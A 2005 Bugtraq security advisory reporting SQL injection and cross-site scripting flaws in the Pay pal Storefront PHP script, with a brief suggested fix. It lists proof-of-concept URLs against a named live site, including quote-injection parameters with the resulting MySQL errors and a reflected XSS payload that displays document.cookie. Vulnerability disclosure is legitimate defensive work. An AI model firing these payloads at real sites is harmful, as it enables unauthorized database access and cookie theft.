[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Multiple sql injection, and xss vulnerabilities in Pay pal Storefront
From: "Diabolic Crab" <dcrab () hackerscenter ! com>
Date: 2005-03-30 18:17:31
Message-ID: 001601c53553$11733dd0$736510ac () rootinc
[Download RAW message or body]
Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/
Severity: High
Title: Multiple sql injection, and xss vulnerabilities in Pay pal
Storefront
Date: March 25, 2005
Summary:
There are multiple sql injection, xss vulnerabilities in the Pay pal
Storefront script.
Proof of Concept Exploits:
http://www.esmistudio.com/hv/ecdis/pages.php?idpages='SQL INJECTION
You have an error in your SQL syntax. Check the manual that corresponds to
your MySQL server version for the right syntax to use near '\'SQL INJECTION'
at line 1
http://www.esmistudio.com/hv/ecdis/products1.php?id=6&id2='SQL
INJECTION&subcat=Asus&p=products1
You have an error in your SQL syntax. Check the manual that corresponds to
your MySQL server version for the right syntax to use near '\'SQL INJECTION
ORDER BY title ASC LIMIT 0, 9' at line 1
http://www.esmistudio.com/hv/ecdis/products1h.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&id2=10&subcat=Asus&p=products1 \
This shows the cookie data. Possible fix: The usage of htmlspeacialchars(), \
mysql_escape_string(),mysql_real_escape_string() and other functions for input \
validation beforepassing user input to the mysql database, or before echoing data on \
thescreen, would solve these problems. Author: These vulnerabilties have been found \
and released by Diabolic Crab, Email:dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, \
please feel free to contact meregarding these vulnerabilities. You can find me \
at,http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab.Lookout for \
my soon to come out book on Secure coding with php.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic